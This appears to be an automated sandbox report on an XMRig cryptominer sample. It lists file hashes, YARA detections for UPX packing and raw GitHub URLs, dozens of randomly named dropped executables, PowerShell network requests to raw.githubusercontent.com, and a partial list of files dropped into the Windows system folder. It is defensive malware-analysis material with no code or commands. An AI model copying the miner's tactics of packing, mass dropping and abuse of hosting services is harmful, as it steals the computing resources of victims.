xmrig | 04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c

Analysis

max time kernel
150s
max time network
156s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
19/03/2024, 17:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
Size

3.1MB
MD5

12f2b11cc3fa7337bd82e54aed32e744
SHA1

997095bebf68ba0a312ceb11e569be32b2705b73
SHA256

04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c
SHA512

9774fc95b4f53ff94dc854eb6f5664675a3292e28a7d50738a29252f1a4d095a596d77ad00501ad017960187e63d0ec7835816ecd59d7260b03456419765b3fc
SSDEEP

98304:S1ONtyBeSFkXV1etEKLlWUTOfeiRA2R76zHrWq:SbBeSFku

Score

10^/10

xmrig miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Detects executables containing URLs to raw contents of a Github gist 64 IoCs

resource	yara_rule
behavioral2/memory/4564-0-0x00007FF7B62B0000-0x00007FF7B66A6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0007000000023213-5.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0007000000023213-8.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0007000000023214-12.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2184-10-0x00007FF7B4510000-0x00007FF7B4906000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0007000000023215-7.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0007000000023215-14.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4312-26-0x00007FF61F5A0000-0x00007FF61F996000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0007000000023217-29.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0007000000023219-44.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x000700000002321f-63.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0007000000023220-76.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0007000000023228-119.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0007000000023221-125.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/876-142-0x00007FF6715F0000-0x00007FF6719E6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x000700000002322a-146.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x000700000002322e-173.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x000700000002322f-179.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2924-184-0x00007FF662530000-0x00007FF662926000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4740-186-0x00007FF73A390000-0x00007FF73A786000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1608-187-0x00007FF7C5830000-0x00007FF7C5C26000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1148-190-0x00007FF7FFA70000-0x00007FF7FFE66000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4952-193-0x00007FF6B91D0000-0x00007FF6B95C6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2896-195-0x00007FF62F150000-0x00007FF62F546000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2908-198-0x00007FF6180D0000-0x00007FF6184C6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2000-200-0x00007FF6B2100000-0x00007FF6B24F6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1432-201-0x00007FF67D8D0000-0x00007FF67DCC6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3356-210-0x00007FF68F650000-0x00007FF68FA46000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2996-229-0x00007FF65E850000-0x00007FF65EC46000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2340-252-0x00007FF6C0FF0000-0x00007FF6C13E6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1828-335-0x00007FF60A460000-0x00007FF60A856000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1852-348-0x00007FF6F46E0000-0x00007FF6F4AD6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4736-350-0x00007FF71CE00000-0x00007FF71D1F6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4408-352-0x00007FF605270000-0x00007FF605666000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2212-354-0x00007FF7E3FD0000-0x00007FF7E43C6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3660-365-0x00007FF7B6210000-0x00007FF7B6606000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3244-398-0x00007FF6DF1B0000-0x00007FF6DF5A6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4160-419-0x00007FF666670000-0x00007FF666A66000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/5140-424-0x00007FF699810000-0x00007FF699C06000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/5204-426-0x00007FF7012E0000-0x00007FF7016D6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/5236-428-0x00007FF7077D0000-0x00007FF707BC6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/5276-430-0x00007FF61EA60000-0x00007FF61EE56000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/5292-431-0x00007FF74E8B0000-0x00007FF74ECA6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/5260-429-0x00007FF6A50E0000-0x00007FF6A54D6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/5220-427-0x00007FF74DFF0000-0x00007FF74E3E6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/5188-425-0x00007FF76A3E0000-0x00007FF76A7D6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/5124-423-0x00007FF64F4A0000-0x00007FF64F896000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/380-422-0x00007FF682550000-0x00007FF682946000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3684-397-0x00007FF79AB60000-0x00007FF79AF56000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3944-392-0x00007FF7D7260000-0x00007FF7D7656000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3704-355-0x00007FF7BBFE0000-0x00007FF7BC3D6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1112-353-0x00007FF6F0650000-0x00007FF6F0A46000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4900-351-0x00007FF76E190000-0x00007FF76E586000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2260-349-0x00007FF6AF8C0000-0x00007FF6AFCB6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2968-313-0x00007FF71E2B0000-0x00007FF71E6A6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4692-294-0x00007FF637210000-0x00007FF637606000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4400-278-0x00007FF76C580000-0x00007FF76C976000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1212-225-0x00007FF727E40000-0x00007FF728236000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1844-202-0x00007FF72BC80000-0x00007FF72C076000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0007000000023232-203.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/752-199-0x00007FF6ABE00000-0x00007FF6AC1F6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4804-196-0x00007FF7025E0000-0x00007FF7029D6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2076-194-0x00007FF76EA80000-0x00007FF76EE76000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1348-192-0x00007FF606380000-0x00007FF606776000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL

UPX dump on OEP (original entry point) 64 IoCs

resource	yara_rule
behavioral2/memory/4564-0-0x00007FF7B62B0000-0x00007FF7B66A6000-memory.dmp	UPX
behavioral2/files/0x0007000000023213-5.dat	UPX
behavioral2/files/0x0007000000023213-8.dat	UPX
behavioral2/files/0x0007000000023214-12.dat	UPX
behavioral2/memory/2184-10-0x00007FF7B4510000-0x00007FF7B4906000-memory.dmp	UPX
behavioral2/files/0x0007000000023215-7.dat	UPX
behavioral2/files/0x0007000000023215-14.dat	UPX
behavioral2/memory/4312-26-0x00007FF61F5A0000-0x00007FF61F996000-memory.dmp	UPX
behavioral2/files/0x0007000000023217-29.dat	UPX
behavioral2/files/0x0007000000023219-44.dat	UPX
behavioral2/files/0x000700000002321f-63.dat	UPX
behavioral2/files/0x0007000000023220-76.dat	UPX
behavioral2/files/0x0007000000023228-119.dat	UPX
behavioral2/files/0x0007000000023221-125.dat	UPX
behavioral2/memory/876-142-0x00007FF6715F0000-0x00007FF6719E6000-memory.dmp	UPX
behavioral2/files/0x000700000002322a-146.dat	UPX
behavioral2/files/0x000700000002322e-173.dat	UPX
behavioral2/files/0x000700000002322f-179.dat	UPX
behavioral2/memory/2924-184-0x00007FF662530000-0x00007FF662926000-memory.dmp	UPX
behavioral2/memory/4740-186-0x00007FF73A390000-0x00007FF73A786000-memory.dmp	UPX
behavioral2/memory/1608-187-0x00007FF7C5830000-0x00007FF7C5C26000-memory.dmp	UPX
behavioral2/memory/1148-190-0x00007FF7FFA70000-0x00007FF7FFE66000-memory.dmp	UPX
behavioral2/memory/4952-193-0x00007FF6B91D0000-0x00007FF6B95C6000-memory.dmp	UPX
behavioral2/memory/2896-195-0x00007FF62F150000-0x00007FF62F546000-memory.dmp	UPX
behavioral2/memory/2908-198-0x00007FF6180D0000-0x00007FF6184C6000-memory.dmp	UPX
behavioral2/memory/2000-200-0x00007FF6B2100000-0x00007FF6B24F6000-memory.dmp	UPX
behavioral2/memory/1432-201-0x00007FF67D8D0000-0x00007FF67DCC6000-memory.dmp	UPX
behavioral2/memory/3356-210-0x00007FF68F650000-0x00007FF68FA46000-memory.dmp	UPX
behavioral2/memory/2996-229-0x00007FF65E850000-0x00007FF65EC46000-memory.dmp	UPX
behavioral2/memory/2340-252-0x00007FF6C0FF0000-0x00007FF6C13E6000-memory.dmp	UPX
behavioral2/memory/1828-335-0x00007FF60A460000-0x00007FF60A856000-memory.dmp	UPX
behavioral2/memory/1852-348-0x00007FF6F46E0000-0x00007FF6F4AD6000-memory.dmp	UPX
behavioral2/memory/4736-350-0x00007FF71CE00000-0x00007FF71D1F6000-memory.dmp	UPX
behavioral2/memory/4408-352-0x00007FF605270000-0x00007FF605666000-memory.dmp	UPX
behavioral2/memory/2212-354-0x00007FF7E3FD0000-0x00007FF7E43C6000-memory.dmp	UPX
behavioral2/memory/3660-365-0x00007FF7B6210000-0x00007FF7B6606000-memory.dmp	UPX
behavioral2/memory/3244-398-0x00007FF6DF1B0000-0x00007FF6DF5A6000-memory.dmp	UPX
behavioral2/memory/4160-419-0x00007FF666670000-0x00007FF666A66000-memory.dmp	UPX
behavioral2/memory/5140-424-0x00007FF699810000-0x00007FF699C06000-memory.dmp	UPX
behavioral2/memory/5204-426-0x00007FF7012E0000-0x00007FF7016D6000-memory.dmp	UPX
behavioral2/memory/5236-428-0x00007FF7077D0000-0x00007FF707BC6000-memory.dmp	UPX
behavioral2/memory/5276-430-0x00007FF61EA60000-0x00007FF61EE56000-memory.dmp	UPX
behavioral2/memory/5292-431-0x00007FF74E8B0000-0x00007FF74ECA6000-memory.dmp	UPX
behavioral2/memory/5260-429-0x00007FF6A50E0000-0x00007FF6A54D6000-memory.dmp	UPX
behavioral2/memory/5220-427-0x00007FF74DFF0000-0x00007FF74E3E6000-memory.dmp	UPX
behavioral2/memory/5188-425-0x00007FF76A3E0000-0x00007FF76A7D6000-memory.dmp	UPX
behavioral2/memory/5124-423-0x00007FF64F4A0000-0x00007FF64F896000-memory.dmp	UPX
behavioral2/memory/380-422-0x00007FF682550000-0x00007FF682946000-memory.dmp	UPX
behavioral2/memory/3684-397-0x00007FF79AB60000-0x00007FF79AF56000-memory.dmp	UPX
behavioral2/memory/3944-392-0x00007FF7D7260000-0x00007FF7D7656000-memory.dmp	UPX
behavioral2/memory/3704-355-0x00007FF7BBFE0000-0x00007FF7BC3D6000-memory.dmp	UPX
behavioral2/memory/1112-353-0x00007FF6F0650000-0x00007FF6F0A46000-memory.dmp	UPX
behavioral2/memory/4900-351-0x00007FF76E190000-0x00007FF76E586000-memory.dmp	UPX
behavioral2/memory/2260-349-0x00007FF6AF8C0000-0x00007FF6AFCB6000-memory.dmp	UPX
behavioral2/memory/2968-313-0x00007FF71E2B0000-0x00007FF71E6A6000-memory.dmp	UPX
behavioral2/memory/4692-294-0x00007FF637210000-0x00007FF637606000-memory.dmp	UPX
behavioral2/memory/4400-278-0x00007FF76C580000-0x00007FF76C976000-memory.dmp	UPX
behavioral2/memory/1212-225-0x00007FF727E40000-0x00007FF728236000-memory.dmp	UPX
behavioral2/memory/1844-202-0x00007FF72BC80000-0x00007FF72C076000-memory.dmp	UPX
behavioral2/files/0x0007000000023232-203.dat	UPX
behavioral2/memory/752-199-0x00007FF6ABE00000-0x00007FF6AC1F6000-memory.dmp	UPX
behavioral2/memory/4804-196-0x00007FF7025E0000-0x00007FF7029D6000-memory.dmp	UPX
behavioral2/memory/2076-194-0x00007FF76EA80000-0x00007FF76EE76000-memory.dmp	UPX
behavioral2/memory/1348-192-0x00007FF606380000-0x00007FF606776000-memory.dmp	UPX

XMRig Miner payload 64 IoCs

miner

resource	yara_rule
behavioral2/memory/4564-0-0x00007FF7B62B0000-0x00007FF7B66A6000-memory.dmp	xmrig
behavioral2/files/0x0007000000023213-5.dat	xmrig
behavioral2/files/0x0007000000023213-8.dat	xmrig
behavioral2/files/0x0007000000023214-12.dat	xmrig
behavioral2/memory/2184-10-0x00007FF7B4510000-0x00007FF7B4906000-memory.dmp	xmrig
behavioral2/files/0x0007000000023215-7.dat	xmrig
behavioral2/files/0x0007000000023215-14.dat	xmrig
behavioral2/memory/4312-26-0x00007FF61F5A0000-0x00007FF61F996000-memory.dmp	xmrig
behavioral2/files/0x0007000000023217-29.dat	xmrig
behavioral2/files/0x0007000000023219-44.dat	xmrig
behavioral2/files/0x000700000002321f-63.dat	xmrig
behavioral2/files/0x0007000000023220-76.dat	xmrig
behavioral2/files/0x0007000000023228-119.dat	xmrig
behavioral2/files/0x0007000000023221-125.dat	xmrig
behavioral2/memory/876-142-0x00007FF6715F0000-0x00007FF6719E6000-memory.dmp	xmrig
behavioral2/files/0x000700000002322a-146.dat	xmrig
behavioral2/files/0x000700000002322e-173.dat	xmrig
behavioral2/files/0x000700000002322f-179.dat	xmrig
behavioral2/memory/2924-184-0x00007FF662530000-0x00007FF662926000-memory.dmp	xmrig
behavioral2/memory/4740-186-0x00007FF73A390000-0x00007FF73A786000-memory.dmp	xmrig
behavioral2/memory/1608-187-0x00007FF7C5830000-0x00007FF7C5C26000-memory.dmp	xmrig
behavioral2/memory/1148-190-0x00007FF7FFA70000-0x00007FF7FFE66000-memory.dmp	xmrig
behavioral2/memory/4952-193-0x00007FF6B91D0000-0x00007FF6B95C6000-memory.dmp	xmrig
behavioral2/memory/2896-195-0x00007FF62F150000-0x00007FF62F546000-memory.dmp	xmrig
behavioral2/memory/2908-198-0x00007FF6180D0000-0x00007FF6184C6000-memory.dmp	xmrig
behavioral2/memory/2000-200-0x00007FF6B2100000-0x00007FF6B24F6000-memory.dmp	xmrig
behavioral2/memory/1432-201-0x00007FF67D8D0000-0x00007FF67DCC6000-memory.dmp	xmrig
behavioral2/memory/3356-210-0x00007FF68F650000-0x00007FF68FA46000-memory.dmp	xmrig
behavioral2/memory/2996-229-0x00007FF65E850000-0x00007FF65EC46000-memory.dmp	xmrig
behavioral2/memory/2340-252-0x00007FF6C0FF0000-0x00007FF6C13E6000-memory.dmp	xmrig
behavioral2/memory/1828-335-0x00007FF60A460000-0x00007FF60A856000-memory.dmp	xmrig
behavioral2/memory/1852-348-0x00007FF6F46E0000-0x00007FF6F4AD6000-memory.dmp	xmrig
behavioral2/memory/4736-350-0x00007FF71CE00000-0x00007FF71D1F6000-memory.dmp	xmrig
behavioral2/memory/4408-352-0x00007FF605270000-0x00007FF605666000-memory.dmp	xmrig
behavioral2/memory/2212-354-0x00007FF7E3FD0000-0x00007FF7E43C6000-memory.dmp	xmrig
behavioral2/memory/3660-365-0x00007FF7B6210000-0x00007FF7B6606000-memory.dmp	xmrig
behavioral2/memory/3244-398-0x00007FF6DF1B0000-0x00007FF6DF5A6000-memory.dmp	xmrig
behavioral2/memory/4160-419-0x00007FF666670000-0x00007FF666A66000-memory.dmp	xmrig
behavioral2/memory/5140-424-0x00007FF699810000-0x00007FF699C06000-memory.dmp	xmrig
behavioral2/memory/5204-426-0x00007FF7012E0000-0x00007FF7016D6000-memory.dmp	xmrig
behavioral2/memory/5236-428-0x00007FF7077D0000-0x00007FF707BC6000-memory.dmp	xmrig
behavioral2/memory/5276-430-0x00007FF61EA60000-0x00007FF61EE56000-memory.dmp	xmrig
behavioral2/memory/5292-431-0x00007FF74E8B0000-0x00007FF74ECA6000-memory.dmp	xmrig
behavioral2/memory/5260-429-0x00007FF6A50E0000-0x00007FF6A54D6000-memory.dmp	xmrig
behavioral2/memory/5220-427-0x00007FF74DFF0000-0x00007FF74E3E6000-memory.dmp	xmrig
behavioral2/memory/5188-425-0x00007FF76A3E0000-0x00007FF76A7D6000-memory.dmp	xmrig
behavioral2/memory/5124-423-0x00007FF64F4A0000-0x00007FF64F896000-memory.dmp	xmrig
behavioral2/memory/380-422-0x00007FF682550000-0x00007FF682946000-memory.dmp	xmrig
behavioral2/memory/3684-397-0x00007FF79AB60000-0x00007FF79AF56000-memory.dmp	xmrig
behavioral2/memory/3944-392-0x00007FF7D7260000-0x00007FF7D7656000-memory.dmp	xmrig
behavioral2/memory/3704-355-0x00007FF7BBFE0000-0x00007FF7BC3D6000-memory.dmp	xmrig
behavioral2/memory/1112-353-0x00007FF6F0650000-0x00007FF6F0A46000-memory.dmp	xmrig
behavioral2/memory/4900-351-0x00007FF76E190000-0x00007FF76E586000-memory.dmp	xmrig
behavioral2/memory/2260-349-0x00007FF6AF8C0000-0x00007FF6AFCB6000-memory.dmp	xmrig
behavioral2/memory/2968-313-0x00007FF71E2B0000-0x00007FF71E6A6000-memory.dmp	xmrig
behavioral2/memory/4692-294-0x00007FF637210000-0x00007FF637606000-memory.dmp	xmrig
behavioral2/memory/4400-278-0x00007FF76C580000-0x00007FF76C976000-memory.dmp	xmrig
behavioral2/memory/1212-225-0x00007FF727E40000-0x00007FF728236000-memory.dmp	xmrig
behavioral2/memory/1844-202-0x00007FF72BC80000-0x00007FF72C076000-memory.dmp	xmrig
behavioral2/files/0x0007000000023232-203.dat	xmrig
behavioral2/memory/752-199-0x00007FF6ABE00000-0x00007FF6AC1F6000-memory.dmp	xmrig
behavioral2/memory/4804-196-0x00007FF7025E0000-0x00007FF7029D6000-memory.dmp	xmrig
behavioral2/memory/2076-194-0x00007FF76EA80000-0x00007FF76EE76000-memory.dmp	xmrig
behavioral2/memory/1348-192-0x00007FF606380000-0x00007FF606776000-memory.dmp	xmrig

Blocklisted process makes network request 2 IoCs

flow	pid	Process
11	228	powershell.exe
15	228	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
2184	hUcinQu.exe
4312	NaLeQQQ.exe
4804	nZgZiEm.exe
2044	TwWkKAd.exe
3952	MMimTlZ.exe
388	CKFyfkI.exe
876	uDWnIcl.exe
1712	zvybAuk.exe
4476	AUYfADW.exe
2264	vJvYviL.exe
4516	ETEnkYy.exe
2924	uWpGyrV.exe
2908	NskCeVV.exe
2808	KnoBmgk.exe
752	ptfjZQo.exe
4740	yUAMmcn.exe
2000	YAltuKb.exe
1608	wQALDiZ.exe
4448	JfoCqMF.exe
1432	GCzFJde.exe
3500	wYwxQXJ.exe
1148	iKthoOq.exe
1928	LuNBsxY.exe
1844	tdrocVb.exe
1348	xZiMCws.exe
4952	BAiBetq.exe
3356	EftSbQY.exe
1212	BHhNnGv.exe
2076	JMbQljf.exe
2996	RZhjzCv.exe
2896	ufCzghf.exe
2340	pBWjpKp.exe
3568	OcJNMJQ.exe
4400	PCmzCJy.exe
4692	mpEuXEN.exe
4468	MEuqDPP.exe
2968	BwmGijC.exe
1828	OtwZOxs.exe
1852	QaWvnkJ.exe
2260	fQmQoDK.exe
4736	RxJDeQX.exe
4900	rQTTGeN.exe
4408	BzWZguV.exe
3040	ZnwPCyN.exe
1112	xkogqAH.exe
2212	cYDVPHH.exe
3704	iORDXhS.exe
3660	xbQoZgh.exe
3944	FnJBSlh.exe
3684	iNJaUie.exe
2148	xJCJoFX.exe
3580	tBvaqeC.exe
3244	NyxQtRg.exe
4160	yobiuBf.exe
380	OiNZjcC.exe
5124	AQhbrBT.exe
5140	tdtbaaQ.exe
5156	rNRvvVF.exe
5188	LReqEyX.exe
5204	CLuglLq.exe
5220	XitlLGY.exe
5236	VakGUXC.exe
5260	Wikxnjq.exe
5276	snGiSuM.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4564-0-0x00007FF7B62B0000-0x00007FF7B66A6000-memory.dmp	upx
behavioral2/files/0x0007000000023213-5.dat	upx
behavioral2/files/0x0007000000023213-8.dat	upx
behavioral2/files/0x0007000000023214-12.dat	upx
behavioral2/memory/2184-10-0x00007FF7B4510000-0x00007FF7B4906000-memory.dmp	upx
behavioral2/files/0x0007000000023215-7.dat	upx
behavioral2/files/0x0007000000023215-14.dat	upx
behavioral2/memory/4312-26-0x00007FF61F5A0000-0x00007FF61F996000-memory.dmp	upx
behavioral2/files/0x0007000000023217-29.dat	upx
behavioral2/files/0x0007000000023219-44.dat	upx
behavioral2/files/0x000700000002321f-63.dat	upx
behavioral2/files/0x0007000000023220-76.dat	upx
behavioral2/files/0x0007000000023228-119.dat	upx
behavioral2/files/0x0007000000023221-125.dat	upx
behavioral2/memory/876-142-0x00007FF6715F0000-0x00007FF6719E6000-memory.dmp	upx
behavioral2/files/0x000700000002322a-146.dat	upx
behavioral2/files/0x000700000002322e-173.dat	upx
behavioral2/files/0x000700000002322f-179.dat	upx
behavioral2/memory/2924-184-0x00007FF662530000-0x00007FF662926000-memory.dmp	upx
behavioral2/memory/4740-186-0x00007FF73A390000-0x00007FF73A786000-memory.dmp	upx
behavioral2/memory/1608-187-0x00007FF7C5830000-0x00007FF7C5C26000-memory.dmp	upx
behavioral2/memory/1148-190-0x00007FF7FFA70000-0x00007FF7FFE66000-memory.dmp	upx
behavioral2/memory/4952-193-0x00007FF6B91D0000-0x00007FF6B95C6000-memory.dmp	upx
behavioral2/memory/2896-195-0x00007FF62F150000-0x00007FF62F546000-memory.dmp	upx
behavioral2/memory/2908-198-0x00007FF6180D0000-0x00007FF6184C6000-memory.dmp	upx
behavioral2/memory/2000-200-0x00007FF6B2100000-0x00007FF6B24F6000-memory.dmp	upx
behavioral2/memory/1432-201-0x00007FF67D8D0000-0x00007FF67DCC6000-memory.dmp	upx
behavioral2/memory/3356-210-0x00007FF68F650000-0x00007FF68FA46000-memory.dmp	upx
behavioral2/memory/2996-229-0x00007FF65E850000-0x00007FF65EC46000-memory.dmp	upx
behavioral2/memory/2340-252-0x00007FF6C0FF0000-0x00007FF6C13E6000-memory.dmp	upx
behavioral2/memory/1828-335-0x00007FF60A460000-0x00007FF60A856000-memory.dmp	upx
behavioral2/memory/1852-348-0x00007FF6F46E0000-0x00007FF6F4AD6000-memory.dmp	upx
behavioral2/memory/4736-350-0x00007FF71CE00000-0x00007FF71D1F6000-memory.dmp	upx
behavioral2/memory/4408-352-0x00007FF605270000-0x00007FF605666000-memory.dmp	upx
behavioral2/memory/2212-354-0x00007FF7E3FD0000-0x00007FF7E43C6000-memory.dmp	upx
behavioral2/memory/3660-365-0x00007FF7B6210000-0x00007FF7B6606000-memory.dmp	upx
behavioral2/memory/3244-398-0x00007FF6DF1B0000-0x00007FF6DF5A6000-memory.dmp	upx
behavioral2/memory/4160-419-0x00007FF666670000-0x00007FF666A66000-memory.dmp	upx
behavioral2/memory/5140-424-0x00007FF699810000-0x00007FF699C06000-memory.dmp	upx
behavioral2/memory/5204-426-0x00007FF7012E0000-0x00007FF7016D6000-memory.dmp	upx
behavioral2/memory/5236-428-0x00007FF7077D0000-0x00007FF707BC6000-memory.dmp	upx
behavioral2/memory/5276-430-0x00007FF61EA60000-0x00007FF61EE56000-memory.dmp	upx
behavioral2/memory/5292-431-0x00007FF74E8B0000-0x00007FF74ECA6000-memory.dmp	upx
behavioral2/memory/5260-429-0x00007FF6A50E0000-0x00007FF6A54D6000-memory.dmp	upx
behavioral2/memory/5220-427-0x00007FF74DFF0000-0x00007FF74E3E6000-memory.dmp	upx
behavioral2/memory/5188-425-0x00007FF76A3E0000-0x00007FF76A7D6000-memory.dmp	upx
behavioral2/memory/5124-423-0x00007FF64F4A0000-0x00007FF64F896000-memory.dmp	upx
behavioral2/memory/380-422-0x00007FF682550000-0x00007FF682946000-memory.dmp	upx
behavioral2/memory/3684-397-0x00007FF79AB60000-0x00007FF79AF56000-memory.dmp	upx
behavioral2/memory/3944-392-0x00007FF7D7260000-0x00007FF7D7656000-memory.dmp	upx
behavioral2/memory/3704-355-0x00007FF7BBFE0000-0x00007FF7BC3D6000-memory.dmp	upx
behavioral2/memory/1112-353-0x00007FF6F0650000-0x00007FF6F0A46000-memory.dmp	upx
behavioral2/memory/4900-351-0x00007FF76E190000-0x00007FF76E586000-memory.dmp	upx
behavioral2/memory/2260-349-0x00007FF6AF8C0000-0x00007FF6AFCB6000-memory.dmp	upx
behavioral2/memory/2968-313-0x00007FF71E2B0000-0x00007FF71E6A6000-memory.dmp	upx
behavioral2/memory/4692-294-0x00007FF637210000-0x00007FF637606000-memory.dmp	upx
behavioral2/memory/4400-278-0x00007FF76C580000-0x00007FF76C976000-memory.dmp	upx
behavioral2/memory/1212-225-0x00007FF727E40000-0x00007FF728236000-memory.dmp	upx
behavioral2/memory/1844-202-0x00007FF72BC80000-0x00007FF72C076000-memory.dmp	upx
behavioral2/files/0x0007000000023232-203.dat	upx
behavioral2/memory/752-199-0x00007FF6ABE00000-0x00007FF6AC1F6000-memory.dmp	upx
behavioral2/memory/4804-196-0x00007FF7025E0000-0x00007FF7029D6000-memory.dmp	upx
behavioral2/memory/2076-194-0x00007FF76EA80000-0x00007FF76EE76000-memory.dmp	upx
behavioral2/memory/1348-192-0x00007FF606380000-0x00007FF606776000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
10	raw.githubusercontent.com
11	raw.githubusercontent.com

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System\jUcrGoM.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\YvxSaLj.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\VFXjlkZ.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\cudrKyh.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
